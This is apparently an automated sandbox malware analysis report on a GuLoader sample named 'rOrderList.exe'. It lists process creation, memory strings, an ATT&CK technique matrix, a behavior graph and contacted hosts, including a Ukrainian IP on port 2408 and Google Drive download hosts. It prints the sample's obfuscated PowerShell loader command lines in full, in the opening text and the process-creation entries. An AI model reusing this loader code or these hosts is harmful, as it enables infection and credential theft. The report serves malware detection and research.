go ibcoy ptfoe g(pn`$delbiu pv ba fr ptat. ns mubibtys pt frgli bnalgnu( t`$tupsoolglopytopanhruohjneji bc lahalralbiy f,sy ac2in) d,fu dr1co6he)ru;no r ga`$gedcooacl nlata irprlreefaa ff f[ i`$gopbiorolunyduplih aoknnsti gcerastlmul ay e/fy2 u]gy b=he ma( s`$ mdudoskl tlpuaudr bl re da cf o[tu`$ompugogll tycopvohtoobrnblimochaasulbul qyex/ b2 l]el ph- sbfrx foscral sa1tr7 c2ca)ov; v mi tu ed i} o ta[ ms mt srcoi rn rgpr]an[ cs sybistatduenimtl. dttoenoxautur. sesenudcsto mdvuiranrygsl] f: c:doabesalc viseiap.pogdee ttbls st br si sn sg a( d`$ bdakosal ilgeafursulprepoatufre)ch;ek}re`$irdrersti mf stcas fh beprr prfoe snge0op=luwsaatof lfune pdfo8cl ne' fffofaedst5tod ofamdbu8 jcve9 ec s1ta8fr2whcfr8coclo0 ockr0tr' s; m`$scdcarhaimafsktsjs mh deterfrr pesnn g1ud= uwhoa df rffoepsdru8no c'hde a1 hc u5stc sfund be fcau3 wdplfchc e3 bc pa td w8 f8 s2 sfcabmac v5 scmo2al9fafbr9 ceun8 s2unfqu9 sc q2afd afbicnadrecreacac j9foeme2 bc nd td s8 icci5sudseaphcfa9 mede1 dcps9sad a8 ucun4prc m3kuc r8indlif a' n;al`$ od rrarionf atmjs uh derersur gepon a2 h=shwdaadef ffede wdsk8ca de' de obomcco9brd p8bif gckad terecdo3 bcdrfstecodlucpe8 pcbu8 rddie mc s9skdfrfkod if b're; b`$ fd srmeiflf bt gs uh me srskr mekinsa3 p=dewova mftof iemid k8 b n'apfnafomdga5ged rffldwa8 gcco9hjcbe1 p8 i2clftiekrd h9docmu2 rdsa8 cc e5facsl1 ic g9mi8se2phear5 sc e2andsp8idcbi9sudgue lc k3kadlecpafkof bcgu9 bdoue pdbvabocnu5acc ufscc h9indnof l8sh2unesk4svc sd pc p2 pcsy8sycpo0 vcit9 af ve ccga9 icpaaov'ua;du`$ bd frafisnfkrtdeskrhafe srsvrsoeman d4da=otw iaaifsof sehadbe8ci n'ged ff adef8redmcefocge5 tcsk2dacdyb b'un; o`$hudcorstigef et ms hhpse orrersre pn m5sa=udw baotf pfgae jdbo8in fr'sne sbincin9sadca8reefr1 pc p3incdi8 bd s9abcto0 tcmr9shekn4necgrdpucpy2recmi8lacli0oncra9pr' s; v`$vud srtrithf ktwos th oe srclrbue mnfa6mo=fowbjasafquf fehad u8at li' sf seepf k8kvf sfofd acpecse9lac pflvcka5erc od fcou0 herh2trc cddicap1 cc k9 g8sk0ud8aicsceda4 gc d5ovcen8nacde9 besteund b5flfclf sc n5 nctibor
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#soldierproof iscremernes vagthundes taktmssigt embroaden secluded #>$bisonerne = """ f;baf jufon bcfetesireoscn t hwlyabefovfloetad b8la un{ v n s al svpafafar laswmba( p[udssctforcoi pn ag s]fo`$ ul rutrvtjamar utsw) k;ca di`$baupencrdbieunc nkbledid n4 l c=ba ls`$jelveuauv ba srant i.salboeenntnggrthjhap;to s fr su u`$frdapomeltilvaablrmal me uahaf h pl=no banhee swtv- coscbbrjunevacuntju chb hyaat sequ[ud] t r( l`$ hu nnnod hedecmik lefadya4mo ph/se un2tr)fn;fo h gr un tfhaoenrni( b`$ rpatolulpayinp eh ro mnkii ac sa blfilgnyre=sk0ak; b fr`$fapwao rlirydopelhpuo on si wc latelull fy d r-krlkltfr ge`$enulinidd jelecemkhvefodsa4lv; t ch`$vepsjoomlgeyalp ahseoufnueisccfla tlcalpaypr+ r=pi2an) m{ f or ko o o re c pr f`$ sd oo klcal sa prhil seudaglfva[ e`$sup loopl sytop ph eo mn uisocsoaraludl myau/ i2be]al ma= h ma[orc to rnirvhoeblr ctsp]be:wa:bet go ibcoy ptfoe g(pn`$delbiu pv ba fr ptat. ns mubibtys pt frgli bnalgnu( t`$tupsoolglopytopanhruohjneji bc lahalralbiy f,sy ac2in) d,fu dr1co6he)ru;no r ga`$gedcooacl nlata irprlreefaa ff f[ i`$gopbiorolunyduplih aoknnsti gcerastlmul ay e/fy2 u]gy b=he ma( s`$ mdudoskl tlpuaudr bl re da cf o[tu`$ompugogll tycopvohtoobrnblimochaasulbul qyex/ b2 l]el ph- sbfrx foscral sa1tr7 c2ca)ov; v mi tu ed i} o ta[ ms mt srcoi rn rgpr]an[ cs sybistatduenimtl. dttoenoxautur. sesenudcsto mdvuiranrygsl] f: c:doabesalc viseiap.pogdee ttbls st br si sn sg a( d`$ bdakosal ilgeafursulprepoatufre)ch;ek}re`$irdrersti mf stcas fh beprr prfoe snge0op=luwsaatof lfune pdfo8cl ne' fffofaedst5tod ofamdbu8 jcve9 ec s1ta8fr2whcfr8coclo0 ockr0tr' s; m`$scdcarhaimafsktsjs mh deterfrr pesnn g1ud= uwhoa df rffoepsdru8no c'hde a1 hc u5stc sfund be fcau3 wdplfchc e3 bc pa td w8 f8 s2 sfcabmac v5 scmo2al9fafbr9 ceun8 s2unfqu9 sc q2afd afbicnadrecreacac j9foeme2 bc nd td s8 icci5sudseaphcfa9 mede1 dcps9sad a8 ucun4prc m3kuc r8indlif a' n;al`$ od rrarionf atmjs uh derersur gepon a2 h=shwdaadef ffede wdsk8ca de' de obomcco9brd p8bif gckad terecdo3 bcdrfstecodlucpe8 pcbu8 rddie mc s9skdfrfkod if b're; b`$ fd srmeiflf bt gs uh me srskr mekinsa3 p=dewova mftof iemid k8 b n'apfnafomdga5ged rffldwa8 gcco9hjcbe1 p8 i2clftiekrd h9docmu2 rdsa8 cc e5facsl1 ic g9mi8se2phear5 sc e2andsp8idcbi9sudgue lc k3kadlecpafkof bcgu9 bdoue pdbvabocnu5acc ufscc h9indnof l8sh2unesk4svc sd pc p2 pcsy8sycpo0 vcit9 af ve ccga9 icpaaov'ua;du`$ bd frafisnfkrtdeskrhafe srsvrsoeman d4da=otw iaaifsof sehadbe8ci n'ged ff adef8redmcefocge5 tcsk2dacdyb b'un; o`$hudcorstigef et ms hhpse orrersre pn m5sa=udw baotf pfgae jdbo8in fr'sne sbincin9sadca8reefr1 pc p3incdi8 bd s9abcto0 tcmr9shekn4necgrdpucpy2recmi8lacli0oncra9pr' s; v`$vud srtrithf ktwos th oe srclrbue mnfa6mo=fowbjasafquf fehad u8at li' sf seepf k8kvf sfofd acpecse9lac pflvcka5erc od fcou0 herh2trc cddicap1 cc k9 g8sk0ud8aicsceda4 gc d5ovcen8nacde9 besteund b5flfclf sc n5 nctiborJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Soldierproof iscremernes Vagthundes Taktmssigt Embroaden Secluded #>$Bisonerne = """ F;BaF juFon BcFetEsireoScn T HWLyaBefOvfLoeTad B8La Un{ V N S Al SvpAfaFar laSwmBa( P[UdSsctForCoi Pn Ag S]Fo`$ UL RuTrvTjaMar Utsw) K;Ca Di`$BaUPenCrdBieUnc NkBleDid N4 L C=Ba Ls`$JeLVeuAuv Ba SrAnt I.SaLBoeEnntngGrtHjhAp;To S fr su U`$FrDApoMelTilVaaBlrMal Me uaHaf H Pl=No BaNHee Swtv- COScbBrjUnevacUntJu Chb Hyaat SeQu[Ud] T R( L`$ HU Nnnod HeDecMik LeFadYa4Mo Ph/Se Un2Tr)Fn;Fo H Gr Un TFHaoEnrNi( B`$ RPAtoLulPayInp Eh Ro MnKii Ac sa BlFilGnyRe=Sk0Ak; B fr`$FaPWao RlIryDopElhPuo On Si Wc LaTelUll Fy D R-KrlKltFr Ge`$EnULinIdd JeLecEmkHveFodsa4Lv; T Ch`$VePSjoOmlGeyAlp AhSeoUfnUeiSccFla TlCalPaypr+ R=Pi2An) M{ F or Ko O O Re C Pr F`$ SD Oo KlCal Sa PrHil SeUdaGlfva[ E`$SuP LoOpl syTop Ph Eo Mn uiSocSoaRalUdl myau/ I2Be]Al Ma= H Ma[Orc To rnIrvHoeBlr CtSp]be:Wa:BeT Go IBCoy PtFoe g(Pn`$DeLBiu Pv Ba fr PtAt. nS MuBibTys Pt FrGli BnAlgNu( T`$TuPSooLglOpyTopAnhRuoHjneji Bc LaHalRalBiy F,Sy Ac2In) D,Fu Dr1Co6He)Ru;No R ga`$GeDCooAcl NlAta IrPrlReeFaa Ff F[ I`$GoPBioRolUnyDupLih AoKnnSti GcErastlMul Ay E/Fy2 U]Gy B=He Ma( S`$ MDUdoSkl TlPuaUdr Bl Re Da Cf O[Tu`$OmPUgoGll TyCopVohToobrnBliMocHaaSulBul QyEx/ B2 L]El Ph- SbFrx FoscrAl Sa1tr7 C2Ca)Ov; V mi Tu Ed I} O Ta[ MS Mt SrCoi Rn RgPr]An[ cS SyBisTatDueNimTl. DTToeNoxAutUr. SEsenUdcsto MdVuiRanRygsl] F: C:DoABeSAlC VIseIAp.PoGDee TtblS st Br Si Sn Sg A( D`$ BDAkoSal IlGeaFurSulPrePoaTufRe)Ch;ek}Re`$IrDRerSti Mf StCas Fh BePrr PrFoe SnGe0Op=luWsaaTof LfUne PdFo8Cl Ne' FFFoFAeDSt5ToD OFAmDBu8 JCVe9 eC S1Ta8Fr2WhCFr8CoCLo0 OCKr0tr' S; M`$ScDCarhaimafSktSjs Mh DeTerFrr PeSnn G1Ud= UWHoa Df RfFoepsdRu8No C'HdE A1 HC u5StC SFUnD BE FCAu3 WDPlFChC E3 BC PA TD W8 F8 S2 SFCaBMaC V5 SCMo2Al9FaFBr9 CEUn8 S2UnFQu9 SC Q2AfD AFBiCnaDReCReACaC J9FoEMe2 BC ND TD S8 ICCi5SuDSeAPhCFa9 MEDe1 DCps9SaD A8 UCUn4PrC M3kuC R8InDLiF A' N;Al`$ OD RrArionf AtMjs Uh DeRerSur GePon A2 H=ShWDaaDef FfEde WdSk8Ca De' DE OBOmCCo9BrD P8BiF GCKaD TEReCDo3 BCDrFStECoDLuCPe8 PCBu8 RDDiE MC S9SkDfrFKoD IF B'Re; B`$ fD SrMeiFlf Bt Gs Uh Me SrSkr MeKinSa3 P=DeWOva MfTof IeMid k8 B N'ApFNaFOmDGa5GeD RFFlDWa8 GCCo9HjCbe1 P8 i2ClFTiEkrD H9DoCMu2 RDSa8 CC e5FaCSl1 IC g9Mi8Se2PhEAr5 SC E2AnDSp8IdCBi9SuDGuE LC K3KaDLeCpaFKoF BCGu9 BDouE PDBvAboCNu5AcC UFScC H9InDNoF L8Sh2UnESk4SvC SD PC P2 PCSy8SyCPo0 VCIt9 AF VE CCGa9 ICPaAOv'Ua;Du`$ BD frafisnfKrtDesKrhAfe SrsvrsoeMan D4Da=OtW IaAifSof seHadBe8Ci N'GeD fF ADEf8reDMcEFoCge5 TCSk2DaCDyB B'Un; O`$huDCorStiGef Et Ms HhPse OrRerSre Pn M5Sa=UdW BaOtf Pfgae JdBo8In Fr'SnE SBInCIn9saDCa8ReEFr1 PC P3InCDi8 BD s9AbCTo0 TCMr9ShEkn4NeCGrDPuCPy2ReCMi8LaCli0OnCRa9Pr' S; V`$VuD SrTriThf KtWos Th Oe SrclrBue MnFa6Mo=foWBjaSafQuf fehad U8at Li' SF SEEpF K8kvF sFofD ACpeCSe9LaC pFLvCka5ErC OD fCou0 HERh2TrC cDdiCAp1 CC K9 G8Sk0Ud8AiCScEDa4 GC D5OvCEn8NaCde9 BEstEUnD B5FlFClF sC N5 NCTiBOrJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
            Source: ieinstal.exe, 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerE
            Source: ieinstal.exe, 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: ieinstal.exe, 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000002.5939740889.00000000075D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rOrderList.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.3488569083.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.3486333941.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 5796, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.3488569083.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.3486333941.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 5796, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts21
            Command and Scripting Interpreter
            1
            Windows Service
            1
            Access Token Manipulation
            1
            Masquerading
            OS Credential Dumping21
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium11
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            PowerShell
            1
            DLL Side-Loading
            1
            Windows Service
            11
            Virtualization/Sandbox Evasion
            LSASS Memory11
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Clipboard Data
            Exfiltration Over Bluetooth1
            Non-Standard Port
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)112
            Process Injection
            1
            Access Token Manipulation
            Security Account Manager2
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
            Ingress Tool Transfer
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)1
            DLL Side-Loading
            112
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer2
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets2
            File and Directory Discovery
            SSHKeyloggingData Transfer Size Limits113
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Obfuscated Files or Information
            Cached Domain Credentials13
            System Information Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 854550 Sample: rOrderList.exe Startdate: 26/04/2023 Architecture: WINDOWS Score: 100 31 googlehosted.l.googleusercontent.com 2->31 33 geoplugin.net 2->33 35 2 other IPs or domains 2->35 47 Found malware configuration 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected GuLoader 2->51 53 5 other signatures 2->53 9 rOrderList.exe 1 21 2->9         started        signatures3 process4 file5 27 C:\Users\user\AppData\Local\...urindic.zoo, ASCII 9->27 dropped 29 C:\Users\user\AppData\Local\...\prldap60.dll, PE32 9->29 dropped 57 Suspicious powershell command line found 9->57 59 Obfuscated command line found 9->59 13 powershell.exe 12 9->13         started        signatures6 process7 signatures8 61 Very long command line found 13->61 16 powershell.exe 13 13->16         started        19 conhost.exe 13->19         started        process9 signatures10 43 Writes to foreign memory regions 16->43 45 Tries to detect Any.run 16->45 21 ieinstal.exe 3 14 16->21         started        25 ieinstal.exe 16->25         started        process11 dnsIp12 37 45.82.84.10, 2408, 49799 ASN-QUADRANET-GLOBALUS Ukraine 21->37 39 googlehosted.l.googleusercontent.com 142.250.185.129, 443, 49797 GOOGLEUS United States 21->39 41 2 other IPs or domains 21->41 55 Tries to detect Any.run 21->55 signatures13

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            rOrderList.exe21%VirustotalBrowse
            rOrderList.exe8%ReversingLabsWin32.Trojan.Generic
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Willness\prldap60.dll0%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            geoplugin.net0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://geoplugin.net/0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpk0%Avira URL Cloudsafe
            http://geoplugin.net/json.gp0%Avira URL Cloudsafe
            http://go.micP0%Avira URL Cloudsafe
            http://subca.ocsp-certum.com050%Avira URL Cloudsafe
            http://geoplugin.net/0%VirustotalBrowse
            http://geoplugin.net/json.gpk0%VirustotalBrowse
            http://geoplugin.net/json.gpI0%Avira URL Cloudsafe
            http://subca.ocsp-certum.com020%Avira URL Cloudsafe
            http://subca.ocsp-certum.com010%Avira URL Cloudsafe
            https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external0%Avira URL Cloudsafe
            45.82.84.100%Avira URL Cloudsafe
            http://crl.microsoft.c0%Avira URL Cloudsafe
            http://geoplugin.net/50%Avira URL Cloudsafe
            http://geoplugin.net/json.gpZ0%Avira URL Cloudsafe
            https://mozilla.org00%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            geoplugin.net
            178.237.33.50
            truefalseunknown
            drive.google.com
            142.250.186.174
            truefalse
              high
              googlehosted.l.googleusercontent.com
              142.250.185.129
              truefalse
                high
                doc-0c-18-docs.googleusercontent.com
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gpfalse
                  • Avira URL Cloud: safe
                  unknown
